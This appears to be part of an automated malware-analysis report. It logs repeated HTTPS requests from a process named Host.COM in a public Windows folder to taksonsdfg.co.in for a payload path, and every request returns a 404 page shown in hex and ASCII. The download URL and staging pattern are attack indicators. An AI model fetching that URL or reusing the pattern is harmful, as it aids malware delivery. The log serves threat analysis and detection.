                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    86192.168.2.450176108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:56 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:56 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:56 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:56 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:56 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    87192.168.2.450178108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:57 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:58 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:57 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:58 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:58 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    88192.168.2.450180108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:58 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:59 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:58 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:59 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:59 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    89192.168.2.450182108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:59 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:00 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:00 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:00 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:00 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    90192.168.2.450184108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:00 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:01 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:01 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:01 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:01 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    91192.168.2.450186108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:02 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:02 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:02 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    92192.168.2.450188108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:03 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:03 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:03 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:03 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:03 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    93192.168.2.450190108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:04 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:04 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:04 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
